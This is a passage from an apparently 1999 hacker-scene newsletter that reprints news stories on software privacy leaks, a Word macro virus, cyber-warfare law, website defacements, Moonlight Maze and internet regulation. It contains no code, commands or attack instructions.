big way." Smith pointed out that the RealPlayers currently in use
will continue to transmit IDs until users upgrade their software.
Smith regularly monitors the behavior of Internet software for security
and privacy flaws.
The identifier is known as a globally unique identifier, or GUID, and is
initiated during the RealPlayer registration process. The number is also
transmitted when users access any site providing RealAudio or RealVideo
streams.
The RealJukebox update was issued to stop the software from transmitting
detailed information about the user's behavior to RealNetworks servers.
According to the company, GUIDs can no longer be associated with any
personal information, such as name and email, provided during RealJukebox
registration.
The RealPlayer, however, doesn't appear to track specific user behavior as
RealJukebox did. It is unclear how many versions of RealPlayer have
transmitted the unique IDs.
RealNetworks' competitors include Microsoft's Windows Media Player, which
users have downloaded 40 million times.
A spokesman for Microsoft confirmed that the Windows Media Player, like
other players, also transmits an identifier. But since Microsoft does not
require user registration, the ID number cannot be tied to personal
information.
"[The transmission of unique identifiers] shows there are all these ways
you can leave these little digital fingerprints, and nobody has studied
this in a systematic way," said Paul Schwartz, law professor at Brooklyn
Law School and co-author of Data Privacy Law.
"We have to figure out what are the privacy implications," he said. "It's
a great illustration of how we just find these things out as we go along."
@HWA
19.0 New Difficult To Kill Macro Virus Found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by nvirb
A new macro virus known as BMH is proving difficult to
kill say Ant-Virus vendors. BMH not only infects the
normal template like most other Macro viruses but also
creates and infects SNrml.dot which it places in the
Word Startup folder. This activates the virus every time
MS Word is launched.
CNN
http://www.cnn.com/TECH/computing/9911/05/word97.virus.idg/index.html
New Word 97 macro virus
discovered
November 5, 1999
Web posted at: 9:52 a.m. EST (1452 GMT)
by Matthew Nelson
From...
(IDG) -- A new macro-based virus
has been discovered, and is being
described as the virus "that will not die
until you put a stake in its heart" by
anti-virus vendor Aladdin Knowledge
Systems.
The latest macro virus to strike is a
Microsoft Word 97 Macro virus called W97M.BMH, or simply BMH,
which infects the global template or normal.dot of Word 97 and will infect
every document opened or created on the infected system. This new virus is
unique in that it not only infects the normal template but it creates a special
file called SNrml.dot in the \Office\STARTUP directory.
While macro viruses are fairly easy to create and more and more common,
this one is different because the normal procedure for removing such viruses,
cleaning the normal.dot file, does not work with BMH. This is because the
virus continues to infect the system from the special SNrml.dot file,
according to Eric Vasbinder, product marketing manager for Aladdin.
"It won't die, it's the undead virus,"
Vasbinder said. "Most macro viruses tend
to infect the normal.doc template only, but
the BMH virus is unique in that it creates
another .dot template and it saves it in the
office start up directory."
"As a result of that, even if you remove the
virus from the normal.dot, it will come back.
Every file that it's in the Office start up
directory will be executed when Word
starts up," Vasbinder added. "It will start up
and reinfect the system once again."
To remove the virus, it is necessary to
remove both .dot files, Vasbinder said.
Once the virus infects a system it will also
set the macro virus warning system within
Office to the lowest setting, enabling future
virus infections. It will also alter the Word application so that when users try
to activate features, a picture will be shown instead.
"It prevents you from performing certain actions in Word. It will modify the
word configuration files, so that certain menu options inside word are
unavailable," Vasbinder said. "It will instead of activating that option, it will
display a picture instead."
No information was available regarding which functions were affected or
what the picture was of, however.
An Aladdin eSafe anti-virus user in the United States discovered the virus
this week using the products "Macro Terminator" technology, which scans
for unauthorized macro file actions, according to the company. Anti-virus
users with heuristic scanning as part of their system will most likely already
be protected, according to Aladdin, but users should always update their
DAT files frequently.
@HWA
20.0 Do the Laws of War Apply in Cyberspace?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
Pentagon officials are worried how the laws of war apply
in the electronic realm. The US feels that existing laws
are adequate to control operations in this new theater
and that practitioners of cyber war still need to worry
about collateral damage to civilian systems. Officials
have also warned about over reacting to attacks on US
systems, stating that the intent or origin must first be
clearly established before a counter cyber attack can
be launched. (If anyone knows where to find the report
mentioned in this article, "An Assessment of Legal
Issues in Information Operations", I would like a copy.)
Washington Post
http://www.washingtonpost.com/wp-dyn/articles/A35345-1999Nov7.html
Late Update 1100EST
Several people where kind enough to send us the entire
document as well as a link to a PDF version. (Warning,
this is extremely dry reading.)
An Assessment of Legal Issues in Information Operations
http://www.terrorism.com/documents/dod-io-legal.pdf
- via Terrorism Research Center
Washington Post;
Military Grappling With Rules for Cyber Warfare
By Bradley Graham
Washington Post Staff Writer
Monday , November 8, 1999 ; A1
During last spring's conflict with Yugoslavia, the Pentagon considered
hacking into Serbian computer networks to disrupt military operations and
basic civilian services. But it refrained from doing so, according to
senior defense officials, because of continuing uncertainties and
limitations surrounding the emerging field of cyber warfare.
"We went through the drill of figuring out how we would do some of these
cyber things if we were to do them," said a senior military officer. "But
we never went ahead with any."
As computers revolutionize many aspects of life, military officials have
stepped up development of cyber weapons and spoken ominously of their
potential to change the nature of war. Instead of risking planes to bomb
power grids, telephone exchanges or rail lines, for example,
Pentagon planners envision soldiers at computer terminals silently
invading foreign networks to shut down electrical facilities, interrupt
phone service, crash trains and disrupt financial systems. But such
attacks, officials say, pose nettlesome legal, ethical and practical
problems.
Midway through the war with Yugoslavia, the Defense Department's top legal
office issued guidelines warning that misuse of cyber attacks could
subject U.S. authorities to war crimes charges. It advised commanders to
apply the same "law of war" principles to computer attack that they
do to the use of bombs and missiles. These call for hitting targets that
are of military necessity only, minimizing collateral damage and avoiding
indiscriminate attacks.
Defense officials said concern about legalities was only one of the
reasons U.S. authorities resisted the temptation to, say, raid the bank
accounts of Yugoslav President Slobodan Milosevic. Other reasons included
the untested or embryonic state of the U.S. cyber arsenal and the
rudimentary or decentralized nature of some Yugoslav systems, which
officials said did not lend themselves to computer assault.
U.S. forces did target some computers that controlled the Yugoslav air
defense system, the officials said. But the attacks were launched from
electronic jamming aircraft rather than over computer networks from
ground-based U.S. keyboards.
No plan for a cyber attack on Yugoslav computer networks ever reached the
stage of a formal legal assessment, according to several defense officials
familiar with the planning. And the 50 pages of guidelines, prepared by
the Pentagon general counsel's office, were not drafted with the
Yugoslav operation specifically in mind.
But officials said the document, which has received little publicity,
reflected the collective thinking of Defense Department lawyers about
cyber warfare and marked the U.S. government's first formal attempt to set
legal boundaries for the military's involvement in computer attack
operations.
It told commanders to remain wary of targeting institutions that are
essentially civilian, such as banking systems, stock exchanges and
universities, even though cyber weapons now may provide the ability to do
so bloodlessly.
In wartime, the document advised, computer attacks and other forms of what
the military calls "information operations" should be conducted only by
members of the armed forces, not civilian agents. It also stated that
before launching any cyber assaults, commanders must carefully gauge
potential damage beyond the intended target, much as the Pentagon now
estimates the number of likely casualties from bomb attacks.
While computer attacks may appear on the surface as a cleaner means of
destroying targets with less prospect for physical destruction or loss
of life than dropping bombs Pentagon officials say such views are
deceiving. By penetrating computer systems that control the
communications, transportation, energy and other basic services in a
foreign country, cyber weapons can have serious cascading effects,
disrupting not only military operations but civilian life, officials say.
Other U.S. government agencies have sided with the Pentagon view that
existing law and international accords are sufficient to govern
information warfare. But Russia is challenging this view.
Over the past year, Moscow has tried to gather support for a United
Nations resolution calling for new international guidelines and the
banning of particularly dangerous information weapons. In comments to the
U.N. secretary general published last month, Russia warned that
information operations "might lead to an escalation of the arms race." It
said "contemporary international law has virtually no means of regulating
the development and application of such a weapon."
But the Russian initiative has drawn little backing. U.S. officials regard
it as an attempt to forestall development of an area of weaponry in which
Russia lags behind the United States.
In a formal response rejecting the Russian proposal, the Clinton
administration said any attempt now to draft overarching principles on
information warfare would be premature.
"First, you have extraordinary differences in the sophistication of
various countries about this type of technology," said a State Department
official involved in the issue. "Also, the technology changes so rapidly,
which complicates efforts to try to define these things."
Instead of turning cyber assaults into another arms control issue, the
administration prefers to treat them internationally as essentially a law
enforcement concern. U.S. officials have supported several efforts through
the United Nations and other groups to facilitate international
cooperation in tracking computer criminals and terrorists.
For all the heightened attention to cyber warfare, defense specialists
contend that there are large gaps between what the technology promises and
what practitioners can deliver. "We certainly have some capabilities, but
they aren't what I would call mature ones yet," a high-ranking U.S.
military officer said.
The full extent of the U.S. cyber arsenal is among the most tightly held
national security secrets. But reports point to a broad range of weapons
under development, including use of computer viruses or "logic bombs" to
disrupt enemy networks, the feeding of false information to sow
confusion and the morphing of video images onto foreign television
stations to deceive. Last month, the Pentagon announced it was
consolidating plans for offensive as well as defensive cyber operations
under the four-star general who heads the U.S. Space Command in Colorado
Springs.
But complicating large-scale computer attacks is the need for an
extraordinary amount of detailed intelligence about a target's hardware
and software systems. Commanders must know not just where to strike but be
able to anticipate all the repercussions of an attack, officials
said.
"A recurring theme in our discussions with military operators is, well, if
we can drop a bomb on it, why can't we take it out by a computer network
attack," said a senior Pentagon lawyer specializing in intelligence.
"Well, you may be able to. However, you've got to go through a few
hoops and make sure that when you're choosing an alternative method,
you're still complying with the law of armed conflict and making sure
collateral damage is limited."
In their guidelines document, titled "An Assessment of International Legal
Issues in Information Operations," the Pentagon's lawyers warned of such
unintended effects of computer attacks as opening the floodgates of a dam,
causing an oil refinery in a populated area to explode in flames or
triggering the release of radioactivity. They also mentioned the
possibility of computer attacks spilling over into neutral or friendly
nations and noted the legal limits on deceptive actions.
"It may seem attractive for a combatant vessel or aircraft to avoid being
attacked by broadcasting the agreed identification signals for a medical
vessel or aircraft, but such actions would be a war crime," said the
document, which was first reported last week by defense analyst
William M. Arkin in a column on The Washington Post's online service.
"Similarly, it might be possible to use computer morphing techniques to
create an image of the enemy's chief of state informing his troops that an
armistice or cease-fire agreement had been signed. If false, this also
would be a war crime."
The document also addressed questions about whether the United States
would be any more justified in using cyber weapons if a foreign adversary
first hacked into U.S. computer networks. The answer: It depends on the
extent of damage. One complicating factor, the defense lawyers
wrote, is the difficulty of being certain about the real source and intent
of some cyber attacks, whose origin can easily be disguised.
In the case of Yugoslavia, U.S. military authorities were slow to put
together a plan for conducting information operations. But one was
eventually assembled and approved by the middle of the 78-day war, the
high-ranking officer said.
The plan involved many traditional information warfare elements
psychological operations, deception actions, electronic jamming of radar
and radio signals targeting not just Yugoslav military and police forces
but Milosevic and his associates, the officer said.
One tactic was to bombard the Yugoslav leadership with faxes and other forms of harassment.
21.0 cDc Has New Trojan Plans
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by EvilWench
Plans are underway for the development of a new trojan
by the Cult of Dead Cow. This will supposedly be done
by modifying commercial Remote Access software that
would be wholly invisible to anti-virus software, even to
those that can detect Back Orifice. This was revealed
by Sir Dystic of the Cult of the Dead Cow while speaking
to UK firms in London. (Somehow we think that the
author of this article completely misunderstood
statements made by Sir Dystic.)
ZD Net
http://www.zdnet.co.uk/news/1999/44/ns-11255.html
News burst: Back Orifice author reveals new
Trojan technique
Fri, 05 Nov 1999 14:15:00 GMT
Will Knight
The author of Back Orifice and a leading hacker at Cult of the
Dead Cow has revealed plans to develop an ingenious new Trojan
technique that has even got anti-virus experts impressed.
"I have been working on turning any piece of commercial software
that provides remote access to a computer into an executable,"
discloses Sir Dystic, one of the hacker group's more prominent
members. "It wouldn't be very difficult to configure it so that it
would work behind the scenes and then how would anti-virus
software that scans for things like Back Orifice be able to detect
it?"
Sir Dystic made this revelation to ZDNet while visiting Britain to
explain to concept of moral hacking to UK companies.
"Full story to follow. "
(unavailable at release time)
@HWA
22.0 India Set To Vote on 'CyberLaw' Bill
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Deepquest
The Information Technology Bill 1999 is set to be
presented before India's Parliament at the end of
November. The bill is said to facilitate electronic
communication, trade, and commerce and prevent
computer crime in the public and private sectors.
C|Net
http://news.cnet.com/news/0-1005-200-1429644.html?tag=st.ne.1005.thed.1005-200-1429644
India sends Net regulation bill to parliament By Reuters Special to CNET
News.com November 4, 1999, 9:55 a.m. PT
NEW DELHI--India's federal cabinet today approved for presentation to
parliament a "cyber law" bill to facilitate electronic trade and commerce
and to prevent computer crimes.
"The cabinet has approved the proposal to introduce the Information
Technology Bill 1999 in the next session of parliament to facilitate
electronic communication, trade, and commerce and prevent computer crime
in public and private [domains]," the government said in a statement.
The next session of parliament is expected to convene from November 29 to
December 23.
A draft of the bill was ready early this year, but it could not be taken
up in parliament following the collapse of the Bharatiya Janata Party-led
coalition government in a confidence vote last April.
The coalition won reelection in September-October elections.
The information technology bill will provide an outline for legal
recognition of electronic records, the statement said.
"The bill provides for a legal framework so that the information is not
denied legal effect, validity, or enforceability solely on the ground that
it is in form of electronic records," it said.
The bill draws tenets from the United Nations Commission on International
Trade Law's model law on e-commerce, Utah and Illinois state laws on
electronic and digital signatures, and the Electronic Transactions Act
enacted by
Singapore in June 1998, officials said.
@HWA
23.0 Public Workshop to Discuss Web Site Profiling To Be Held
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
A public workshop will be held Monday to discuss the
use of online profiling by e-commerace web sites. The
workshop will be held by the Federal Trade Commission
and the Department of Commerce along with privacy
advocates and online advertisers to discuss the use of
online profiling.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2389386,00.html?chkpt=zdnntopb
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Advocates call for halt to online profiling
By Jennifer Mack, ZDNN
November 5, 1999 4:41 PM PT
URL:
The Federal Trade Commission and the Department of Commerce will hold a public workshop
Monday with privacy advocates and online advertisers to discuss the use of online profiling.
On Friday, privacy groups urged the FTC to immediately halt all online profiling pending an
investigation, and speed up legislation that would protect consumer's privacy. The practice of
creating user profiles involves gathering information on users' surfing habits, which can be used to
deliver advertising targeted to people's specific interests.
"The technology that's been developed over the past two years for profiling and collecting
information about Web surfers has become so intrusive that these profiles are an unacceptable
violation of consumer privacy," explained Jason Catlett, president of Junkbusters Corp., a privacy
advocacy group. "The government needs to protect consumers from having this information
assembled without their consent and control."
Catlett and others say the industry's attempts to regulate itself when it comes to online privacy
have been unsuccessful. He points to the industry's TRUSTe organization as an example of failed
regulation. TRUSTe evaluates its members' privacy policies and allows cooperating Web sites to
post a TRUSTe logo promoting their compliance.
"TRUSTe doesn't do anything very useful," said Catlett. "The worst privacy violators are not going
to pay TRUSTe to be looked at. So there's nothing to protect consumers from really bad
violators."
Online advertisers often point to users' ability to turn off information gathering "cookies" as the best
way to stop sites from collecting personal data. Cookies are special tools used by Web sites that
collect information about who you are and what you do when you're online. They can be
deactivated by switching them off in your browser options. But Andrew Shen, policy analyst for
the Electronic Privacy Information Center, believes expecting users to know how to turn off the
cookie option is unreasonable.
Unreasonable burden
"The burden of privacy background is totally backward, said Shen. "It shouldn't be up to
consumers to protect themselves."
The privacy groups attending Monday's meeting with the FTC feel that the industry's standard
"opt-out" policy, which requires consumers to take steps to prevent their data from being
gathered, is unfair. They want Web users to be notified before information is collected and give
their consent. The alternative, they feel, is the destruction of the Internet's free and open
environment.
"Everything on the Internet is going to be targeted towards you," said Shen. "You'll no longer be
able to just browse the Net anonymously. So, in some ways, profiling really defeats what the
Internet is all about."
@HWA
24.0 Naval Station Upgrades Web Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Naval Station Ingleside, located near Corpus Christi
Texas, has upgraded its web site security after a group
seeking freedom for Kashmir, Pakistani Hackerz Club,
reportedly defaced the site.
Austin American-Statesman
http://www.austin360.com/technology/stories/1999/11/06hackers.html
Technology
Texas naval base
upgrades web security
after being hacked
Associated Press
Posted: Nov. 5, 1999
CORPUS CHRISTI -- Naval Station Ingleside
has upgraded its web site security after a
group seeking freedom for Kashmir reportedly
hacked the site.
The security was upgraded after someone
modified the index for the Web site and
inserted a banner that popped up on the
screen when a user opened the page.
The banner contained a political message from
the Pakistani Hackerz Club, which said it is
rallying for the freedom of the Kashmir region
from Indian control.
By one estimate, the group has struck about
85 civilian and military sites in several nations
since it began its hacking spree. That includes
Lackland Air Force Base's web site.
Lt. Cmdr. Kris Winter, executive officer for the
ship maintenance activity at Ingleside, said the
hacked site didn't contain any classified
information, only public information about
Shore Intermediate Maintenance Activity.
Security for the site has been enhanced, she
said.
@HWA
25.0 Sony Reveals Addresses of 2.5 Million Subscribers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
E-mail addresses of subscribers to Sony Music's
Infobeat service were exposed to advertisers, a result
of a software flaw. Advertisers were able to see the
e-mail addresses of those subscribers who have clicked
at certain advertisements sent through Sony's mailing
list. Sony claimed that all of the advertisers where
contacted and that none of them collected or used this
information in anyway.(Yeah right. Yo, TrustE, time for
yet another investigation?)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2389775,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Sony glitch reveals subscriber e-mail addresses
By Margaret Kane, ZDNN
November 8, 1999 6:18 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2389775,00.html?chkpt=zdhpnews01
A software flaw allowed advertisers to view the e-mail addresses of subscribers to Sony Music
Entertainment Corp.'s Infobeat service, the company said.
The roughly 2.5 million users who subscribe to Infobeat get a daily e-mail update of music and
entertainment news. The newsletter contains advertisements that give special URLs for interested
consumers.
"By clicking on select advertisements, certain advertisers had the ability to obtain the e-mail
address of the user who clicked on the link," the company said in a letter to subscribers.
Sony said it had recently been informed of the error and had fixed the problem, but advised
subscribers to set up passwords for their accounts.
The company said it contacted its advertisers, who "confirmed that they did not collect or use any
of this information."
Privacy issues have become a hot topic recently. Last week, RealNetworks (Nasdaq: RNWK)
ran into trouble after it was disclosed that the company had been tracking data about the music its
customers downloaded.
Today, the Federal Trade Commission and the Commerce Department will host a workshop to
review whether online profiling practices invade users' privacy. Advocates last week called for the
FTC to order a halt on online profiling pending an investigation.
@HWA
26.0 TrustE to Rethink Charter
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by turtlex
After realising that the recent privacy fiasco
perpetrated by Real Networks was outside of its
joursidiction the industries self appoited privacy
guardian will rethink its charter. TrustE says that itcan
only investigate web sites that violate privacy issues
and not music applications that work over the internet.
Wired
http://www.wired.com/news/technology/0,1282,32388,00.html
TRUSTe Declines Real Probe
by Chris Oakes
3:00 a.m. 9.Nov.1999 PST Privacy watchdog group TRUSTe declined Monday to
investigate RealNetworks, but the decision has prompted the organization
to expand its charter.
It is the second time the group has determined that a significant privacy
concern lies beyond the scope of its program. Although TRUSTe has
investigated several major violations and hundreds of minor incidents, it
has never revoked a Web site's right to display its privacy seal.
TRUSTe conducted an initial inquiry last week into the behavior of
RealNetworks' RealJukebox software, which was surreptitiously gathering
data about the music-listening habits of its users and passing it on to
the company. The inquiry is intended to determine if a TRUSTe member
company may have violated privacy terms.
RealNetworks subsequently issued a patch to keep the software from
tracking the unique identifier that allowed RealNetworks to tie the
tracking data to users' personal information.
TRUSTes stated mission is to regulate the use of personal data submitted
to Web sites by accepting input from consumers. TRUSTe declined to
investigate RealNetworks because RealJukebox is music-listening software
that works via the Internet, but only indirectly through a Web site
visit.
As a result, the self-monitoring group has determined that it needs to
expand its program to include a wider range of data collections.
"Unfortunately, yes, [the RealNetworks privacy problem] falls outside the
scope of our program," said TRUSTe spokesman Dave Steer. "Because of that,
we're going to be evolving the program."
The "trustmark" license grants companies the right to bear a seal on their
Web sites if they comply with TRUSTes privacy policy. The seal was
designed to ensure that companies disclose their data collection
practices.
The same technicality has previously led the organization to back out of
privacy matters that appeared on their face to be relevant to TRUSTe's
mission. TRUSTe cited the scope issue when it declined to investigate a
privacy question related to Microsoft's Windows registration
process.
When people registered their Windows software, Microsoft's registration
program gathered a unique identifier from the user's disk. But, since the
process didn't explicitly involve the company's Web site, TRUSTe didn't
investigate.
Sensing a pattern of exemptions that could limit its reach -- as well as
consumer confidence in the TRUSTe seal -- the organization announced a
plan to expand its scope on Monday.
"The line between the data that's collected at a Web site and the data
that can be collected over the Internet, such as GUID [global unique
identification number], has been blurred," said TRUSTe's Steer. "That's
why we're expanding the program."
Steer said TRUSTe would call on experts inside and outside the Internet
industry to determine how to expand the program to include the behavior of
software. The behavior of Internet software, such as RealNetworks', is
much more complex and less apparent, he said.
When the program incorporates more kinds of Net-enabled behaviors, Truste
hopes to be in a good position to monitor the increasingly omnipresent
activity of data collection.
"In an increasingly networked society where there are 'EZ-passes' and
supermarket cards, this type of incident is going to become increasingly
common. So it's time to expand the program," Steer said.
TRUSTe recommended RealNetworks adopt a five-point plan that could help
bolster consumer trust, given the recent problems.
The TRUSTe news occurred on the same day that RealNetworks issued updated
software to address a newer privacy problem affecting its streaming software
product, RealPlayer.
@HWA
27.0 Russians Exploited SIPRnet Gateways
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evenprime
So what exactly did the Russians get during Moonlight
Maze? Where classified systems compromised? SIPRNet
Breached? Passwords stolen? Why was all of DOD asked
to change their passwords a few months back? It looks
like Moonlight Maze had a bigger impact on US systems
than originally revealed. Unauthorised connections
between NIPRNet andSIPRNet may have leadtoa wider
intrusion than the public was lead to believe. (Hmmm,
no classified information? I wonder.)
PBS - The Pulpit, by Robert X. Cringely
http://www.pbs.org/cringely/pulpit/pulpit19991104.html
Let Them Eat Borscht
Maybe Russians Have Been
Hacking DoD Servers After All, but
It's Still Our Fault
By Robert X. Cringely
Okay, so I was wrong. No, not about Y2K. As you'll
read later on, some of the most surprising people are
beginning to agree with my level-headed view of that
problem. Where I was wrong was in my declaration three
weeks ago that even if Russians were trooping through web sites at the
Pentagon as the FBI was claiming it really didn't matter. I saw this as whining on
the part of a group of Federal intelligence and law enforcement officials trying to
increase their own power. And it may have been all that, but it also turns out to
be a lot more.
My error was in basing that column on logic and not paying enough attention to
human nature. The syllogism I constructed was simple: Even if programmers
from the Russian Academy of Sciences were attacking Pentagon web sites,
those web sites were there specifically to be attacked. The rules at the
Department of Defense say that only non-classified information can be held on
servers available to the public, so the DoD must simply accept the Russian
invasion as fair use. Federal officials complaining about the loss of "sensitive
information" had no right to complain, it seemed to me. What the Russians were
doing was no more or less than what spider programs at Excite or Google are
doing every day to servers all over the world.
My mistake, if turns out, was in not looking further into those words "sensitive
information," and in failing to remember how we tend to compromise our own
systems for ease of administration.
This column is apparently read in higher places than I ever expected. As a result,
some significant new information has dropped into my lap. Here is what I have
learned since that first column appeared. While computer systems with classified
information are not supposed to be connected to the public Internet, such
systems WERE connected. Pentagon webmasters gave themselves
administrative access to some classified machines through unclassified machines.
It wasn't malicious, just stupid, but the result was that the clever folks at the
Russian Academy of Sciences (apparently they were the culprits, after all)
gained root level access to a number of servers. Soon they were messing where
they shouldn't have been a-messing.
It's not exactly clear how much information was lost, but it could have been a lot
given the fact that the "sensitive information" referred to by the FBI was a wealth
of login passwords for several hundred thousand individual users at the
Department of Defense. The FBI was apparently finnessing the language since
passwords, which are by definition secret, aren't actually considered officially
"secret." Sheesh!
Once the breach was noticed, they cut the links between the secret and
non-secret machines and told a few hundred thousand people to change their
passwords. End of problem ... they hope. This has to be a wakeup call, though,
to any organization that has information it wants to keep to itself. There are
probably such administrative worm holes in most systems composed of dozens
or hundreds of servers and the right kind of spider program will find them all.
Well, this is the week when Judge Thomas Penfield Jackson presents his finding
of facts in the Microsoft anti-trust case. It hits the fan on Friday, and apparently,
officials of Microsoft and the Department of Justice have been in almost
continuous negotiations trying to head off the whole thing. They are trying to
come up with a consent decree that will be, in effect, an out of court settlement
of case. Microsoft doesn't want to be damned by the judge, and the DoJ wants
to use this to push a restructuring at the software giant. But I have to tell you, I
just don't buy the idea that Bill Gates is going to agree to anything that
fundamentally hurts his company. Expect no breakthrough unless it involves
major government concessions.
The reason I don't expect an out of court settlement is because the DoJ won't
accept a cosmetic consent decree (remember this whole case came about
because Microsoft was accused of violating the last consent decree), and
Microsoft won't accept any agreement that has real teeth. Both sides have been
molding their cases for months on the assumption that Judge Penfield Jackson
will rule against Redmond on Friday. Gates already expects to be dragged
through the mud and just hopes to see it all reversed by the more conservative
appeals court.
Remember this finding of fact is not the penalty phase of the case. That's still
months away, if ever. And Microsoft has many legal weapons it can use to stall
real change for years. As I have long said, the day Microsoft is broken in pieces
will be the day when Bill Gates decides several little Microsofts are worth more
than one big Microsoft. No matter what the judge says this week, the real
power is still in Bill's hands.
Finally back to Y2K. Now that Rev. Jerry Falwell has revised his alarmist and
highly profitable views on Y2K, I think we can expect similar shifts on the part
of other Y2K zealots. Some folks have even hinted to me that Gary North, the
original Y2K extremist, would be shifting shortly. While I see no indication of
that yet, I do take some comfort in knowing that Dr. North has enough
confidence in the idea that maybe -- just maybe -- the world information
infrastructure will remain intact enough after January 1 to allow him to continue
offering TWO YEAR subscriptions to his newsletter.
If anyone is going to make money from Y2K, I want it to be my favorite Marilyn
Monroe imitator, Cybele, who has just released the last disco classic of the
century, a little ditty called Y2Kymca.com. Download the MP3 and learn why
gentlemen prefer blondes, especially blondes with accordions.
@HWA
28.0 FBI Director Calls For International Cooperation on Online Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evenprime
FBI Director Louis Freeh says that tracking computer
criminals should become a matter as important as
foreign policy, defense, or economic issues. He is calling
for increased cooperation between countries to track
down and prosecute internet criminals.
Rueters - Via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2389802,00.html?chkpt=zdnntop
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Computer crime outrunning law enforcement
By David Brunnstrom, Reuters
November 8, 1999 8:04 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2389802,00.html?chkpt=zdnntop
BANGKOK -- The spread of computers has made life easier for terrorists, pedophiles, drug
dealers and financial fraudsters, making closer cooperation between police forces vital in the new
millennium, the FBI said Monday.
"Information technology, which is a wonder for the promotion of education and good things, is
also used by people to do harm and commit crime," Louis Freeh, the director of the Federal
Bureau of Investigation, told a news conference.
"Whether you are a pedophile using the Internet, or a terrorist looking to shut down a stock
exchange or the 911 emergency system...these are threats that are facilitated by globalization and
information technology."
International cooperation
F
reeh said technology now allowed someone sitting in a far-off country to use a laptop computer
to steal millions of dollars from a bank in New York, or to plan chemical weapon attacks.
It had progressed beyond the abilities of law enforcement to counter such threats.
"So I think the millennium will require international cooperation at unprecedented levels," he said.
"What has to happen is that high-level law enforcement officers, governments,
presidents, prime ministers, have to ensure law enforcement issues are as
important as matters of foreign policy, as defense issues and economic
issues," he said.
"More and more we see the developments of technical means and
information technologies that allow crimes and criminals to communicate
quicker than ever.
"It means borders between our countries and jurisdictions between our police
agencies have less and less importance.
"What we need to do is to apply the rule of law and be as competent and as
fast moving and as coordinated as those who would break the law using the
advantages of globalization," said Freeh.
A global battle
Freeh was in Thailand to discuss cooperation with Prime Minister Chuan Leekpai and other
officials and spoke at an International Law Enforcement Academy set up last year as a U.S.-Thai
initiative.
One of two worldwide -- the other is in Budapest -- it has taught some 600 students from
Thailand, Laos, Vietnam, Malaysia, Singapore, Indonesia, the Philippines, China and Hong Kong.
They have addressed narcotics trafficking, white-collar crime, financial investigations, trafficking of
women and children, illegal migration and intellectual property rights.
In Thailand, Freeh discussed anti-terrorism initiatives, the threat of biological and chemical
weapons, and issues like money laundering, which Bangkok recently passed legislation to combat.
He said locating the academy in Thailand showed the United States saw Thailand as "regional
leader in terms of law enforcement" and praised its efforts in fighting narcotics.
Freeh spoke before heading to Seoul on the last leg of an Asian tour that has taken him to Japan,
the Philippines, Singapore as well as Thailand -- all, like the United States, facing problems from
abuse of methamphetamines.
He said it was up to producer countries, like Myanmar, to make "honest" and "sustained" efforts
to combat the trade.
"But the real issue has to be addressed on the consumer demand level and the United States has
to do a much better job with respect to that as we ask other countries to do their share."
@HWA
29.0 Lebanon Outlaws Voice Over IP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by skoubidou
Last January the The Ministry of Post and
Telecommunications in Lebanon banned ISPs from
offering Voice over Internet services including video
conferencing. This forces people in Lebanon to use the
state run telephone service which charges up to 10
times the rate that the ISPs did.
Lebanese Daily Star
http://archive.dailystar.com.lb/leb/1999/January99/18_1_99/N11.HTM
Late Update 0935EST
In responce to the above action a private web site has
been set up to detail how to work around the
governments ban.
Internet Telephony in Lebanon
http://members.xoom.com/zork48
Lebanese Daily Star ;
PTT Ministry bans overseas phone calls via Internet
Zayan Khalil Daily Star staff
The Ministry of Post and Telecommunications Saturday banned Internet
service providers from offering voice communication services. The service,
known as the Voice Over the Internet, provides Internet subscribers with a
cheap means of calling overseas. Abdel-Monem Youssef, the ministrys
director-general of operations and maintenance, warned that Internet
service providers would be prosecuted if they failed to comply with the
terms and regulations of their licenses. The licenses, which were granted
by the ministry, instruct Internet companies to refrain from offering
voice services. Video conferencing was also prohibited. The ministry has
the exclusive right to provide international and local lines, Mr. Youssef
said. Internet companies that dont abide by the terms of their license
are reducing the ministrys revenues and depleting public funds.
Subscribers to the phone service make international calls from regular
land lines by dialing their Internet account number followed by the phone
number abroad. Unlike other Internet phone services, subscribers to the
Internet phone do not require a computer to place their calls, only a
regular phone. The cost is charged directly to the subscribers Internet
access account. Following the ministrys decision, Intracom Products
announced the suspension of its phone-via-Internet service. Intracom, one
of several companies that offered what it called the i-phone service,
launched a nation-wide advertising campaign a week ago to promote the new
product. An announcement on the companys website Sunday said, if you
have any remaining i-credits on your i-phone account, they will be
transferred in a few days to your Internet account. In a statement, the
company apologized to the ministry for any inconvenience caused by
offering the service. Bahjat Darwish, the general manager of IntraCom
Products, described his companys license breach as a misunderstanding
with the ministry but refused to elaborate. We understood the ministrys
